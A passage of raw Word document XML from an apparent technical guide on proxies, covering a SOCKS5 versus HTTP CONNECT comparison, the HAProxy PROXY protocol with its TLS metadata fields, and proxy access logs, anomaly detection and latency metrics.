        <w:gridCol w:w="3836"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="5B6BC94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E43B63" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Property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C73030" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SOCKS5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907881" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP CONNECT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="12208E3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1474AA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Protocol support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CC847D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Any TCP + UDP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036402" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>TCP only (HTTP-tunneled)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="7CB170F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FBFC8B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Authentication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1414F2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Built into protocol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746773" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>HTTP Proxy-Authorization header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="0FB4777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473A1A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>DNS resolution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8CBBDB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Client or proxy (configurable)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0F942E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Proxy always resolves</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="0E5D1C3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57C00A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Overhead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6EEEC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Minimal (binary protocol)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CA9257" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>HTTP header overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="00544D3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0FAF77" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:lastRenderedPageBreak/>
              <w:t>Firewall bypass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CB2106" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Can use any port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BED73E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Usually port 443 (HTTPS-looking traffic)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="691DFF0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236C88" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Application support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077BAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Requires SOCKS-aware app or OS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202451" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>HTTP-aware apps natively support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ECEAECD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The PROXY Protocol (HAProxy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A14CBD6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Distinct from SOCKS — </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PROXY Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> is a header prepended to TCP connections to pass connection metadata (client IP, port) from one proxy to the next, preserving the real client information through a proxy chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADC90A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PROXY Protocol v1 (text-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA6548C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A065EB2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>PROXY TCP4 192.0.2.1 198.51.100.1 56324 443\r\n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B925B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>&lt;protocol&gt; &lt;client_ip&gt; &lt;proxy_ip&gt; &lt;client_port&gt; &lt;proxy_port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA6FAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Prepended to the TCP stream before any application data. The backend reads and strips this header before processing the application protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FADF52" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PROXY Protocol v2 (binary):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Fixed 12-byte header + variable address data. More efficient to parse. Supports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27560B5B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>IPv4 and IPv6 addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE6F3D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Unix domain socket connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFE2E14" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="577"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Additional TLV (Type-Length-Value) extensions: TLS information (cipher suite, certificate CN), custom application data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3ABAF1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS information in PROXY Protocol v2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> When the proxy terminates TLS, it can include TLS session metadata in PROXY Protocol v2 TLV extensions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372264D3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PP2_TYPE_SSL: Indicates TLS was used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82D21D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PP2_SUBTYPE_SSL_CN: The client certificate's Common Name (for mTLS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC365BF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PP2_SUBTYPE_SSL_CIPHER: The negotiated cipher suite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0923279B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="578"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PP2_SUBTYPE_SSL_VERSION: TLS version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B32945" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>The backend receives this information without needing to process TLS itself — the proxy does TLS and forwards the metadata. The backend can make authorization decisions based on the client certificate CN without implementing TLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08430C3E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="1C76FF72">
          <v:rect id="_x0000_i3061" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3967A4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Proxy Observability — What the Proxy Sees and Exposes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849AC23" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Logs — The Complete Request Record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D7EFA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every request through a proxy generates an </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>access log entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. The proxy sees both the request and response — more information than either the client or server alone can log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DD0280" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key fields in a proxy access log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B5E5DC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FD80D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>timestamp           2024-01-15T10:30:45.123Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04504E3B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>client_ip           192.0.2.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5E94E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>client_port         54321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04640DD6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>method              POST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D737C93" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>scheme              https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227EBEDD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>host                api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736CE53F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>path                /v1/payments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A38E3C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>query               ?retry=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24946073" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>status_code         200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B44EEA5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>request_size        1842     (bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E842C19" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>response_size       4521     (bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C942C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_host       10.0.1.5:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ED34B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_latency    142ms    (time spent waiting for backend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0B9344" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>total_latency       145ms    (total time including proxy overhead)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D6242" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>request_id          a7f3c2d1-...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004F4D8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>user_agent          Mozilla/5.0...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5EF050" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>tls_version         TLSv1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3621F4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>tls_cipher          TLS_AES_256_GCM_SHA384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC15D4A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>cache_status        MISS     (HIT/MISS/EXPIRED/REVALIDATED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E24BCF2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The upstream_latency vs total_latency difference is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxy overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — time spent in connection pool management, TLS termination, header parsing, routing decision, etc. This overhead should be &lt;1ms for well-tuned proxies. If it's 10ms+, the proxy itself is a latency bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22715A52" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Log-based anomaly detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2BD6C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The access log is a complete record of all traffic. Analyzing it reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49DCF0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error rate spikes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Sudden increase in 5xx or 4xx responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD8AAD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency degradation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> upstream_latency trending upward → backend is slowing down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BADDE1F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic anomalies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Sudden request volume increase → DDoS or client bug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182F2BD9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security events:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Requests matching WAF signatures, unusual user agents, scanning patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1DC7A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client behavior changes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Mobile SDK update causing different API call patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16641A73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metrics — The Quantitative View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957775C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Proxies expose rich metrics for monitoring systems. Critical metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8AC622" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DFEBA8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>requests_per_second: Total RPS. Breakdown by host, path, method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6055B0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="580"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>bytes_in_per_second / bytes_out_per_second: Bandwidth utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC4099D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency metrics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B1D396" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>request_latency_p50/p95/p99/p999: Latency distribution. P999 catches extreme outliers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0EC53C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_connect_time: Time to establish backend connection (high value → connection pool exhaustion or backend unreachable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB15AEC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>upstream_header_time: Time from request sent to first response byte received.</w:t>
      </w:r>
    </w:p>
